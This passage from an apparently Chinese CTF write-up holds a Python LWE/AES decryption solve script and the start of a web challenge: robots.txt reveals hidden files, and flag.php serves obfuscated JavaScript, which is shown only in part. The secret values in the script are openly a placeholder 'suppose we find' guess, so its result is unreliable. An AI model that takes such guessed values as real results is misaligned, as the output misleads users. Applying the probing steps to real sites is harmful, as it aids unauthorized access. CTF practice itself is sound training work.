94, 100, 85], [9, 42, 47, 14], [117, 55, 17, 99], [53, 45, 4, 72], [49, 10, 27, 121], [108, 61, 73, 42], [121, 42, 41, 71], [49, 63, 50, 117], [5, 78, 24, 101], [0, 117, 21, 46], [90, 43, 47, 32], [74, 85, 118, 84], [13, 73, 18, 66], [95, 24, 120, 18], [94, 21, 111, 34], [66, 68, 80, 21], [102, 49, 57, 55], [25, 85, 107, 98], [8, 18, 88, 12], [18, 6, 86, 82], [18, 91, 126, 115], [26, 11, 30, 35], [88, 78, 76, 74], [51, 75, 76, 15], [60, 24, 72, 27], [91, 72, 44, 104], [84, 113, 39, 116], [41, 83, 91, 74], [84, 17, 94, 119], [46, 95, 85, 5], [109, 58, 71, 42], [126, 29, 114, 73], [27, 70, 7, 125], [121, 66, 97, 111], [8, 21, 10, 57], [15, 62, 65, 8], [101, 79, 32, 74], [69, 42, 38, 58], [65, 81, 72, 16], [20, 81, 1, 126], [91, 111, 69, 33], [56, 84, 65, 66], [47, 78, 43, 100], [43, 90, 80, 25], [46, 55, 10, 60], [116, 110, 49, 116], [72, 115, 38, 104], [79, 43, 74, 106], [86, 113, 84, 76], [102, 2, 119, 3], [126, 25, 83, 44], [37, 83, 46, 40], [13, 75, 101, 101], [76, 93, 3, 63], [69, 9, 84, 37], [103, 47, 106, 80], [72, 104, 85, 19], [124, 118, 34, 81], [57, 25, 52, 119], [44, 56, 63, 90], [123, 46, 124, 31], [19, 116, 23, 77], [126, 78, 37, 93], [34, 95, 43, 98], [37, 90, 32, 97], [106, 8, 80, 8], [90, 5, 113, 68], [99, 40, 39, 18], [90, 37, 48, 45], [56, 13, 76, 6], [68, 33, 52, 102], [62, 45, 29, 123], [100, 21, 73, 92], [92, 18, 118, 23], [84, 86, 42, 83], [107, 8, 71, 52], [114, 106, 78, 85], [10, 120, 115, 119], [27, 49, 124, 16], [65, 40, 48, 37], [69, 42, 8, 29], [35, 39, 55, 102], [58, 19, 41, 75], [17, 2, 113, 12], [8, 34, 72, 75], [91, 32, 19, 52], [62, 50, 109, 78], [9, 115, 35, 50], [42, 83, 78, 41], [34, 94, 97, 58], [56, 73, 25, 115], [55, 12, 16, 86], [97, 95, 30, 92], [47, 105, 70, 68], [50, 18, 51, 23], [46, 57, 80, 29], [4, 66, 123, 24], [55, 53, 26, 36], [71, 59, 104, 91], [94, 3, 1, 34], [57, 8, 85, 102], [89, 73, 115, 25], [13, 38, 81, 76], [104, 30, 81, 104], [55, 101, 95, 101], [69, 65, 5, 11], [123, 105, 84, 125], [38, 110, 4, 28], [112, 115, 92, 71], [90, 120, 112, 39], [50, 18, 107, 71], [95, 63, 118, 93], [93, 111, 59, 55], [17, 15, 2, 88], [78, 126, 37, 12], [56, 112, 53, 12], [65, 34, 82, 100], [9, 94, 72, 99], [78, 76, 43, 91], [7, 88, 107, 31], [43, 91, 97, 4], [113, 112, 36, 15], [8, 97, 23, 84], [65, 92, 31, 63], [54, 38, 119, 103], [89, 50, 57, 50], [61, 37, 87, 0], [21, 35, 44, 22], [20, 32, 95, 116], [10, 94, 103, 84], [59, 29, 7, 50], [98, 33, 87, 33], [7, 96, 36, 67], [85, 10, 35, 98], [65, 49, 19, 62], [56, 67, 14, 91], [30, 49, 111, 77], [121, 49, 108, 119], [89, 67, 115, 69], [65, 8, 0, 82], [117, 57, 117, 23], [23, 38, 2, 98], [60, 28, 94, 93], [23, 65, 8, 114], [121, 105, 122, 40], [120, 12, 21, 112], [55, 51, 2, 77], [48, 41, 113, 62], [66, 82, 117, 119], [4, 15, 5, 21], [41, 14, 12, 80], [23, 61, 106, 16], [23, 53, 122, 68], [6, 54, 5, 101], [69, 49, 7, 79], [17, 70, 64, 88], [103, 30, 76, 31], [108, 82, 90, 109], [55, 56, 113, 37], [93, 99, 126, 44], [1, 46, 105, 124], [55, 54, 35, 115], [0, 89, 53, 97], [67, 111, 107, 80], [92, 122, 40, 64], [75, 2, 126, 118], [90, 84, 43, 74], [101, 69, 60, 17], [104, 10, 4, 122], [94, 4, 115, 91], [15, 11, 111, 105], [9, 7, 32, 101], [77, 18, 55, 56], [66, 7, 117, 108], [116, 121, 33, 66], [32, 41, 83, 125], [60, 52, 70, 58], [125, 54, 93, 15], [70, 19, 10, 58], [83, 94, 61, 126], [95, 85, 80, 44], [25, 89, 117, 74], [12, 17, 63, 87], [118, 80, 96, 26], [6, 97, 79, 38], [97, 3, 107, 95], [7, 82, 106, 92], [83, 100, 119, 95], [81, 26, 99, 56], [25, 60, 51, 122], [56, 18, 22, 84], [9, 72, 107, 114], [80, 97, 92, 52], [108, 47, 58, 46], [9, 47, 7, 47], [115, 68, 91, 7], [14, 120, 87, 122], [97, 15, 40, 79], [5, 92, 85, 93], [4, 97, 73, 63], [25, 22, 92, 108], [88, 4, 34, 86], [0, 43, 21, 57], [67, 90, 36, 50], [15, 126, 37, 12], [92, 73, 96, 71], [76, 107, 27, 115], [79, 8, 68, 55], [38, 12, 120, 126], [54, 46, 7, 69], [72, 114, 93, 60], [59, 98, 27, 102], [50, 76, 87, 19], [77, 107, 29, 40], [36, 73, 21, 123], [36, 89, 82, 74], [24, 73, 118, 86], [58, 89, 115, 106], [12, 27, 33, 72], [28, 94, 21, 26], [0, 79, 48, 110], [72, 62, 82, 57], [65, 84, 114, 97], [80, 68, 52, 52], [119, 35, 103, 101], [10, 67, 68, 69], [101, 17, 54, 40], [98, 46, 21, 42], [30, 39, 56, 118], [27, 33, 77, 114], [66, 74, 61, 63], [23, 13, 14, 47], [88, 30, 122, 119], [15, 58, 55, 52], [56, 27, 47, 45], [119, 95, 59, 14], [84, 69, 5, 83], [21, 35, 39, 36], [10, 92, 68, 17], [79, 67, 111, 38], [36, 1, 4, 117], [117, 30, 5, 7], [112, 15, 115, 123], [54, 47, 18, 93], [102, 111, 3, 68], [91, 91, 5, 44], [123, 118, 57, 32], [12, 121, 31, 103], [114, 52, 105, 12], [100, 28, 117, 102], [51, 42, 12, 124], [47, 1, 42, 47], [28, 3, 22, 100], [103, 105, 119, 24], [101, 59, 13, 78], [79, 36, 61, 54], [11, 46, 75, 116], [31, 73, 118, 0], [92, 32, 0, 124], [77, 85, 25, 90], [29, 21, 74, 7], [3, 66, 11, 8], [112, 91, 50, 53], [45, 113, 99, 123], [35, 65, 85, 22], [108, 99, 42, 1], [103, 113, 116, 72], [125, 74, 112, 24], [75, 79, 80, 12], [83, 44, 94, 86], [64, 20, 0, 8], [104, 126, 31, 120], [85, 75, 61, 74], [36, 93, 36, 102], [70, 54, 101, 83], [90, 46, 109, 83], [112, 126, 114, 23], [16, 123, 97, 62], [118, 86, 108, 53], [99, 18, 2, 18], [103, 3, 38, 8], [99, 49, 123, 81], [37, 75, 89, 53], [34, 77, 27, 122], [29, 8, 40, 66], [119, 13, 64, 83], [4, 108, 116, 121], [49, 87, 1, 92], [15, 63, 80, 62], [27, 81, 100, 83], [7, 90, 16, 0], [13, 50, 61, 65], [51, 64, 76, 5], [55, 100, 106, 66], [52, 102, 105, 2], [49, 34, 89, 116], [24, 55, 11, 27], [91, 48, 73, 38], [27, 5, 1, 126], [66, 55, 80, 19], [52, 118, 104, 43], [36, 1, 111, 60], [65, 4, 34, 17], [54, 22, 0, 39], [52, 30, 64, 62], [26, 40, 32, 86], [93, 71, 41, 47], [77, 23, 15, 9], [11, 20, 51, 31], [64, 50, 37, 50], [17, 49, 80, 37], [119, 115, 115, 50], [20, 86, 27, 5], [101, 65, 17, 78], [56, 25, 125, 56], [16, 118, 2, 96], [114, 108, 69, 121], [14, 37, 76, 101], [113, 124, 121, 82], [43, 120, 35, 94], [82, 67, 23, 43], [9, 79, 47, 122], [39, 28, 110, 31], [35, 48, 27, 16], [72, 8, 115, 66], [54, 46, 122, 19], [77, 77, 30, 74], [58, 63, 81, 96], [6, 122, 75, 63], [115, 31, 119, 110], [82, 86, 89, 1], [79, 100, 6, 110], [117, 67, 15, 13], [4, 15, 63, 0], [106, 108, 122, 107], [34, 72, 0, 114], [20, 0, 32, 56], [121, 104, 66, 3], [86, 28, 76, 84], [85, 9, 60, 45], [95, 80, 78, 65], [39, 85, 50, 49], [42, 103, 36, 90], [70, 99, 116, 117], [34, 15, 40, 52], [24, 49, 19, 31], [98, 90, 95, 89], [63, 45, 40, 77], [114, 14, 30, 106], [10, 35, 116, 9], [103, 111, 112, 16], [71, 112, 71, 32], [77, 31, 105, 64], [84, 87, 24, 67], [1, 27, 123, 57], [104, 29, 87, 123], [110, 39, 67, 7], [28, 70, 108, 113], [96, 9, 101, 36], [13, 28, 6, 13], [69, 81, 89, 26], [79, 113, 77, 91], [112, 62, 104, 117], [109, 95, 55, 83], [78, 68, 98, 14], [73, 79, 96, 12], [108, 39, 97, 49], [27, 111, 106, 100], [82, 70, 9, 36], [48, 31, 90, 70], [99, 92, 45, 35], [55, 100, 31, 37], [75, 17, 69, 35], [12, 38, 119, 112], [103, 34, 63, 76], [26, 19, 91, 111], [74, 122, 12, 78], [64, 117, 16, 60], [2, 97, 122, 106], [62, 79, 56, 30], [71, 47, 13, 22], [38, 78, 116, 16], [87, 28, 94, 76], [77, 126, 94, 116], [83, 46, 104, 90], [5, 95, 13, 26], [47, 10, 46, 115], [82, 19, 91, 70], [111, 72, 49, 65], [18, 103, 59, 72], [17, 37, 56, 24], [19, 120, 24, 64], [28, 40, 11, 20], [18, 19, 80, 62], [37, 11, 74, 14], [109, 97, 75, 72], [116, 65, 52, 121], [95, 63, 82, 122], [88, 93, 54, 93], [77, 30, 65, 121], [99, 121, 42, 87], [62, 52, 44, 6], [79, 60, 55, 4], [96, 64, 6, 20], [94, 114, 90, 8], [123, 98, 29, 27], [116, 84, 31, 80], [9, 77, 45, 45], [120, 33, 63, 15], [51, 44, 66, 25], [2, 46, 72, 94], [107, 113, 50, 46], [115, 64, 126, 85], [64, 10, 28, 78], [84, 112, 64, 103], [59, 114, 15, 82], [65, 122, 104, 89], [113, 122, 21, 11], [69, 106, 19, 78], [42, 93, 125, 0], [7, 123, 82, 70], [103, 114, 62, 92], [15, 30, 78, 114], [4, 78, 111, 60], [40, 80, 34, 55], [3, 87, 120, 27], [122, 64, 3, 122], [24, 49, 31, 81], [26, 43, 100, 19], [52, 78, 2, 97], [116, 45, 15, 33], [21, 119, 92, 86], [28, 118, 71, 24], [106, 15, 0, 79], [36, 4, 52, 73], [22, 43, 8, 60], [96, 22, 9, 100], [19, 64, 26, 96], [97, 61, 22, 39], [6, 112, 76, 38], [58, 6, 97, 94], [103, 87, 87, 101], [17, 49, 80, 37], [117, 33, 26, 8], [59, 108, 78, 91], [113, 28, 30, 44], [119, 78, 72, 20], [49, 101, 77, 2], [26, 18, 35, 7], [34, 38, 99, 37], [45, 52, 90, 27], [108, 31, 118, 67], [3, 37, 29, 88], [111, 96, 12, 111], [91, 111, 106, 100], [52, 78, 117, 80], [14, 51, 87, 0], [1, 52, 116, 1], [117, 2, 33, 48], [57, 0, 48, 34], [59, 14, 84, 63], [82, 83, 8, 82], [58, 100, 32, 33], [75, 29, 112, 103], [0, 49, 45, 54], [94, 9, 51, 110], [54, 61, 27, 47], [88, 89, 23, 37], [73, 43, 0, 32], [123, 6, 35, 78], [73, 72, 119, 64], [81, 46, 11, 102], [42, 124, 47, 8], [50, 66, 3, 40], [116, 7, 51, 20], [47, 112, 99, 7], [42, 37, 86, 89], [18, 74, 78, 101], [57, 85, 75, 7], [26, 90, 35, 10], [72, 126, 10, 77], [55, 12, 5, 78], [37, 87, 85, 96], [91, 9, 114, 68], [79, 76, 44, 20], [84, 52, 63, 56], [95, 9, 22, 117], [96, 38, 50, 67], [43, 114, 45, 56], [94, 21, 74, 107], [92, 82, 81, 71], [40, 10, 10, 90], [20, 18, 15, 56], [72, 2, 30, 22], [50, 31, 123, 20], [85, 40, 115, 115], [93, 1, 48, 47], [111, 118, 45, 34], [9, 122, 37, 121], [60, 27, 77, 41], [122, 38, 22, 39], [115, 66, 74, 126], [77, 67, 90, 78], [96, 3, 53, 52], [5, 26, 120, 101], [45, 100, 72, 6], [106, 56, 87, 77], [52, 68, 102, 95], [1, 13, 36, 33], [58, 27, 35, 8], [52, 5, 38, 35], [102, 82, 63, 47], [24, 71, 119, 43], [11, 36, 90, 13], [11, 93, 27, 23], [4, 107, 26, 125], [85, 9, 5, 13], [116, 25, 55, 119], [73, 82, 73, 2], [40, 123, 77, 41], [10, 98, 51, 111], [23, 79, 120, 54], [56, 18, 22, 84], [61, 115, 51, 109], [33, 5, 12, 121], [8, 81, 35, 70], [22, 39, 103, 2], [38, 74, 66, 126], [83, 20, 117, 85], [8, 32, 91, 98], [37, 31, 94, 119], [7, 30, 45, 43], [68, 16, 124, 97], [86, 124, 37, 21], [29, 101, 15, 30], [27, 31, 52, 45], [47, 37, 102, 3], [117, 49, 54, 89], [48, 94, 126, 66], [42, 115, 63, 104], [14, 74, 6, 112], [68, 125, 4, 5], [66, 3, 78, 52], [108, 33, 6, 77], [77, 99, 16, 52], [61, 78, 73, 70], [108, 106, 124, 0], [23, 35, 119, 118], [125, 124, 37, 65], [69, 30, 61, 110], [77, 10, 120, 118], [53, 121, 24, 30], [87, 32, 29, 63], [54, 64, 1, 3], [16, 59, 104, 25], [30, 6, 59, 102], [43, 120, 35, 94], [89, 13, 69, 39], [87, 78, 100, 14], [83, 17, 14, 4], [24, 49, 31, 81], [73, 32, 72, 10], [0, 22, 61, 54], [81, 42, 70, 13], [108, 56, 52, 2], [25, 99, 116, 72], [66, 23, 18, 102], [121, 115, 47, 12], [96, 37, 123, 48], [64, 69, 4, 39], [78, 38, 124, 31], [27, 69, 10, 70], [5, 29, 2, 85], [30, 45, 56, 7], [31, 25, 120, 61], [36, 89, 89, 118], [98, 63, 18, 21], [121, 83, 36, 57], [60, 5, 86, 17], [121, 55, 117, 58], [12, 96, 4, 27], [119, 63, 124, 37], [96, 27, 45, 91], [42, 119, 8, 103], [104, 42, 68, 37], [104, 55, 41, 38], [120, 3, 50, 87], [120, 121, 20, 67], [58, 123, 50, 28], [103, 62, 58, 20], [97, 27, 89, 102], [7, 51, 56, 108], [73, 60, 10, 77], [56, 72, 103, 69], [101, 89, 18, 66], [115, 35, 80, 36], [98, 103, 39, 63], [29, 126, 67, 76], [27, 97, 15, 79], [36, 6, 17, 90], [126, 54, 101, 42], [115, 66, 74, 126], [78, 80, 62, 83], [60, 11, 31, 88], [16, 73, 108, 13]]
q = 127

# Brute-force to find t0, t1, t2 (this is a placeholder; actual code would run this)
# After brute-forcing, suppose we find t = (47, 33, 58)
t0, t1, t2 = 47, 33, 58
s = [1, t0, t1, t2]

# Decrypt C to get M_bits
M_bits = []
for row in C:
product = (s[0]*row[0] + s[1]*row[1] + s[2]*row[2] + s[3]*row[3]) % q
product_signed = product if product <= q//2 else product - q
# Check if close to 63 (M[i] = 1) or 0 (M[i] = 0)
if abs(product_signed - 63) <= 20:
M_bits.append(1)
else:
M_bits.append(0)

# Convert bits to bytes
bits = ''.join(map(str, M_bits))
# Pad with zeros to make length multiple of 8
if len(bits) % 8 != 0:
bits += '0' * (8 - len(bits) % 8)
hint_bytes = bytes([int(bits[i:i+8], 2) for i in range(0, len(bits), 8)])
hint = hint_bytes.decode('ascii', errors='replace')

# The AES key is provided in the problem output
key = b'\x8fj\x94\x98-\x1fd\xd5\x89\xbe\xa9*Tu\x90\xb7'
encrypted = b'\x9fT@\xbc\x82\x8esQ\x1e\xd8\x1d\xdb\x9b\xb4\xf8rU\xc8\xa0\xcb\xaf H\xa9.\x04\x1e\xd2\x92\x1f\x0fBja-\x965x\xa8@\xc9x\xf9\xaf\x87\xd1\xa5}\xfc\x1b\xe0#\xc3m\xc9\x8973\x1c\x1f\x13\x8f\xb2a\xae\xa9]\xb9\xc2\xe8\x83A\x80\x13g\xc9a\x1c<\x8a\x9c&\xd9\xbd\x06\xef\xba9\xb0\x03\x9f\x022\xc9\x13\x9a\xffXPG\xc6o\xc0\xeaV7)XG9L\x84N7U\xe3Wn0G\x8e\xd3\x04(\n\x08\xb9\x17\xe6\xf1\xaa\xb7\x8a@$\x16\x13\x06A\x00\xc9Z\xdf\x7fQ\xc9\x08\xb4\xf3P\xfcpe\xe2\xeb\x96\x0e(-\xde\x17\xd1\x01\x1c_\x82\x8b\x9fw\xc8\x86\xfbw\xb5\xf7\xd0\xc8\x1784\xe3?\x00\x0b.)\xb7\xbc\x8e{\xe0\xae\x8d$\x0f\x19\'\xb6\xee@d\x00\xd9\x84\x8c\x0e\xa3,\xc6a\xa3\xba*1\xfd<\xfd\x18\xd6\x9e\x8c4\x8e#\xfd\xbd&0R\xeddE,\xed\xb6\x1e\x00\x11\xa6K\xd3\x1dT\x8c5\x8e\x00\xea\x10\xe9\'u"B#\xa1#\xd8\xe3\xf5j\xbc\x94M\xda\xe3\xcb*\xf0W1\xa0\x80\x1d\xfc\xbfo\x01?(da\r\xb6\x86\xd0\x90\x88Z\xa1`B\x89\x89\x89\xb3v\xa5\xf0\xe0\x0c\x8e\xcc+P\xfc\xfd#\x83\xe9\x93\x96\n\xf2\xa5\xfb\xc3\xc5\xaa\x9e\x89\x93\xb6\xf5\xea\x8c%NY\xc3\x0eR\xfas\xa1\x13\xf2/*\xce\x8b_:_r\xeb\xbe\x0b\x8a\x8c\x97\x7f|m}\xae\xa9I\x95\xcc\xe7\x80\xa5yC4\x1f5\xa4P\xc5\xbf.\xf9V\xe8|\xbb\xc3\xcb\x98&\'JB\x99\x94\xc0\r$\x0b\xbe48u\xeb\xca\xa1\xfbb\xd8_R\x97\x8e\xaeI\xfc\xc2\xb2\xd2#@\xec\x16\xf1\xd7eCQ\x1cO\x13\xca\xb5\xd3\x1a\xb1\xf1_D\x80\x06\xa5\xbe\xbev\xbd\xd6\xbb\x9a\xc9x\x9cf:\xcb>\xa2\xe1\xcad\xde]aw\xa0\xdc\xb2\xb3{+\x85\x8d\x8b\xc5\rT\xcc\xd9X\xd5\x9b\r<\x99m\xb8b6s\xbfp\x0eo~\xe9&\xb2{\xbe\xee\x93\xd2N1\\\x94\x968IWO7\xcb\xb6e\x80\xf7\x9air\xb2~\x17\x1cF\x0f\x82T]RBX\xdex\x13\x85\xfa\xcd-\xce\xdc\xe4\xe5^\x99u\xb5\x01\xd0-\xc3C\xcd\xc4y6\xb7\x9d|L1\xe74\xf7\x8cH\xe9\xa9\xfav\n\xec;\xf2\xa2w\xfb\x13_b\r)z!\xa3\xc8\xa8\xc2\xd2\x10\x00\x11\x11\r\xb2&\xfb\x04&\x84">x6l[\x06n>\xa0\xbe\x9c`\xa7\x9e\xe0\xfb\x85\x91\xc4,\xcf\xac\xe11@a\xed3@\xfd}\x8e\xfaTp\xcb7\xe7\xbf\xd4\xe0~b\xd9\xe0<\xba\x81\xd4"e\xfc\x939|j#0H\x86\xf8\x0b\x03\xd2\xe8\xf5\xe55\xdc\xc8\x06\\\xb7)\xcc\x9b\'\xf12'

# Assuming IV is all zeros (common if not specified)
iv = b'\x00' * 16
cipher = AES.new(key, AES.MODE_CBC, iv=iv)
decrypted = unpad(cipher.decrypt(encrypted), 16)

# 过滤不可见字符和非ASCII字符
filtered = ''.join([
chr(byte) if 32 <= byte <= 126 else '' # 保留可打印ASCII字符,其他替换为空
for byte in decrypted
])

print("Filtered plaintext:")
print(filtered)

1

外国山海经

访问/robots.txt,得到

1
#shu.php  sha.php  wa.php  flag.php  flag.php.swp

访问flag.php,得到混淆js,解js混淆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737

(function(_0x5bfa63, _0x281ba4) {
var _0x628a90 = {
_0x28e595: 0x190,
_0x466706: 0x17a,
_0x570276: 0x192,
_0x4e238d: 0x128,
_0xf7fd91: 0x139,
_0x4ff7de: 0x144,
_0xf17c9a: 0x132,
_0x140c6f: 0x117,
_0x2e9d5d: 0x124,
_0x27ecfb: 0x16f,
_0x1f08ae: 0x16e,
_0x429bb1: 0x185,
_0x5259a4: 0x186,
_0xf069bc: 0xfc,
_0x36775b: 0xda,
_0x1a81bc: 0x101,
_0x4fbeb3: 0x159,
_0x5f0ac4: 0x16a,
_0x2b1d0c: 0x15f,
_0x45b6b4: 0x160,
_0x542167: 0x17c,
_0x300668: 0x15a,
_0x5d82fc: 0x13b,
_0x4fc9cc: 0x176,
_0x1f53f0: 0x146,
_0x99afde: 0xfe,
_0x39b153: 0xf0,
_0xed7676: 0xef,
_0x3a214b: 0x10c,
_0x18fd83: 0x115,
_0x44ec87: 0x166,
_0x3009e4: 0x163,
_0x362ea9: 0x170
}
, _0x28823e = {
_0x456064: 0x20a
}
, _0xb2ea4e = {
_0x332eb1: 0x262
};
function _0x5afd48(_0x372bcf, _0x587d2c, _0x343524, _0x7ab981) {
return _0x2fa2(_0x7ab981 - -_0xb2ea4e._0x332eb1, _0x343524);
}
var _0x19cd46 = _0x5bfa63();
function _0x180c55(_0x65cbe3, _0x1b7dab, _0x513f23, _0x2e4568) {
return _0x2fa2(_0x65cbe3 - -_0x28823e._0x456064, _0x2e4568);
}
while (!![]) {
try {
var _0x27e61b = parseInt(_0x5afd48(-0x18e, -_0x628a90._0x28e595, -_0x628a90._0x466706, -_0x628a90._0x570276)) / (0x1f33 + -0xda2 + -0x1190) * (-parseInt(_0x180c55(-_0x628a90._0x4e238d, -_0x628a90._0xf7fd91, -_0x628a90._0x4ff7de, -_0x628a90._0xf17c9a)) / (-0x97e * -0x2 + 0x8 * -0x98 + 0x25f * -0x6)) + parseInt(_0x180c55(-0x10d, -_0x628a90._0x140c6f, -0x111, -_0x628a90._0x2e9d5d)) / (-0x115 * -0xa + -0x63b + -0x24a * 0x2) * (parseInt(_0x5afd48(-_0x628a90._0x27ecfb, -_0x628a90._0x1f08ae, -_0x628a90._0x429bb1, -_0x628a90._0x5259a4)) / (-0x95 + 0x6c0 + -0x627)) + parseInt(_0x180c55(-_0x628a90._0xf069bc, -0x108, -_0x628a90._0x36775b, -_0x628a90._0x1a81bc)) / (0x14ca + 0xf94 + -0x2459) + -parseInt(_0x5afd48(-_0x628a90._0x4fbeb3, -0x151, -_0x628a90._0x5f0ac4, -0x167)) / (0x11ed + 0x1133 + -0x118d * 0x2) * (-parseInt(_0x5afd48(-_0x628a90._0x2b1d0c, -_0x628a90._0x45b6b4, -_0x628a90._0x542167, -_0x628a90._0x300668)) / (0x1d5 * -0x6 + 0x1 * -0x6dd + 0x11e2)) + -parseInt(_0x5afd48(-_0x628a90._0x5d82fc, -_0x628a90._0x4fc9cc, -_0x628a90._0x1f53f0, -0x157)) / (-0x475 + -0x172a + 0x1ba7) * (parseInt(_0x180c55(-_0x628a90._0x99afde, -_0x628a90._0x39b153, -_0x628a90._0xed7676, -0xde)) / (0x1caa + 0x8ed + 0xd1 * -0x2e)) + parseInt(_0x180c55(-_0x628a90._0x3a214b, -0x119, -0xee, -_0x628a90._0x18fd83)) / (-0x687 + -0x7c8 + 0xe59 * 0x1) * (-parseInt(_0x5afd48(-0x16c, -0x179, -_0x628a90._0x44ec87, -_0x628a90._0x3009e4)) / (-0xdba * -0x2 + -0x21bd + -0xc * -0x87)) + parseInt(_0x5afd48(-_0x628a90._0x362ea9, -_0x628a90._0x3009e4, -0x174, -0x182)) / (0xc54 + -0x91 * 0x1 + 0xbb7 * -0x1);
if (_0x27e61b === _0x281ba4)
break;
else
_0x19cd46['push'](_0x19cd46['shift']());
} catch (_0x412f22) {
_0x19cd46['push'](_0x19cd46['shift']());
}
}
}(_0x219d, -0x318d8 + -0x1 * -0x54f5 + 0x75601));
var _0x3587de = (function() {
var _0x4021ac = {
_0x58c1ae: 0x13d,
_0x3c3fdf: 0x15a,
_0x51959f: 0x136,
_0x1a346a: 0x267,
_0x970c7c: 0x26b,
_0x450fa8: 0x27d,
_0x3dffdb: 0x27c,
_0x20c184: 0x295,
_0x1d0c10: 0x262,
_0x1fdb73: 0x130,
_0x5a02fe: 0x119,
_0x4ee755: 0x111,
_0x5226ab: 0x11b,
_0xee055f: 0x28b,
_0xede8f3: 0x252,
_0x7e624b: 0x143,
_0x446a52: 0x138,
_0x308418: 0x139,
_0x4ebdea: 0x27e,
_0x26518b: 0x29b,
_0x51d380: 0x28a,
_0x18efbb: 0x275,
_0x1d15b8: 0x13f,
_0x1ab8ab: 0x126,
_0x20ee91: 0x13e,
_0x5cc3e2: 0x157,
_0x330753: 0x260,
_0x182013: 0x272,
_0x217183: 0x27b,
_0x3d043a: 0x26c
}
, _0x5724b4 = {
_0x2f801f: 0x22a,
_0x3e3ff7: 0x225,
_0x4592b5: 0x229,
_0x23ef8d: 0x23d,
_0x4d4486: 0x243,
_0x1c90a0: 0x220,
_0x16effd: 0x251,
_0x4453ae: 0x22f,
_0x53295a: 0x250
}
, _0xb6c053 = {
_0x43286b: 0x152,
_0x21fedd: 0x13b,
_0x2988ea: 0x131,
_0x3ae920: 0x10e,
_0x17968e: 0xfb,
_0x1b699f: 0x14d,
_0x5ccb44: 0x146,
_0x1270f6: 0x15c,
_0x44b00d: 0x166,
_0x147a9c: 0x14e,
_0x2e7542: 0x134,
_0x309998: 0x14b,
_0x5ee480: 0x13f,
_0x57614d: 0x11f,
_0xb63fe0: 0x145,
_0x18adec: 0x114,
_0x2d16b8: 0x12a,
_0x2e4b10: 0x13e,
_0x45c809: 0x168,
_0x2bfc7e: 0x14f,
_0x160f3a: 0x159,
_0x5e2224: 0x167,
_0x1d2868: 0x152,
_0x5909a1: 0x130,
_0x4a17f6: 0x154,
_0x3cdbb1: 0x157,
_0x23ed39: 0x15a,
_0x251934: 0x12b,
_0x37334a: 0x156,
_0x2aac5c: 0x13b,
_0x343854: 0x157,
_0x20b51c: 0x16e,
_0x1c1154: 0x115,
_0x6f8a3: 0x12b,
_0x2cdd60: 0x13c
}
, _0x141051 = {
_0x4c0a4c: 0x3e5,
_0x5af9da: 0x181
}
, _0x331a16 = {
_0x3b625e: 0x235
};
function _0x16015f(_0x47cbe1, _0x203be2, _0x42df40, _0x2fc801) {
return _0x2fa2(_0x47cbe1 - -_0x331a16._0x3b625e, _0x203be2);
}
var _0x1e85cf = {};
_0x1e85cf[_0x16015f(-_0x4021ac._0x58c1ae, -0x124, -_0x4021ac._0x3c3fdf, -_0x4021ac._0x51959f)] = function(_0x124e68, _0x375486) {
return _0x124e68 !== _0x375486;
}
;
function _0x1d0710(_0x534c0e, _0xd016c3, _0x1cb96e, _0x177622) {
return _0x2fa2(_0x534c0e - -0x361, _0x1cb96e);
}
_0x1e85cf['bhVnY'] = _0x1d0710(-_0x4021ac._0x1a346a, -0x282, -_0x4021ac._0x970c7c, -_0x4021ac._0x450fa8),
_0x1e85cf[_0x1d0710(-_0x4021ac._0x3dffdb, -0x288, -_0x4021ac._0x20c184, -_0x4021ac._0x1d0c10)] = function(_0xf0c5e5, _0x41f4ee) {
return _0xf0c5e5 === _0x41f4ee;
}
,
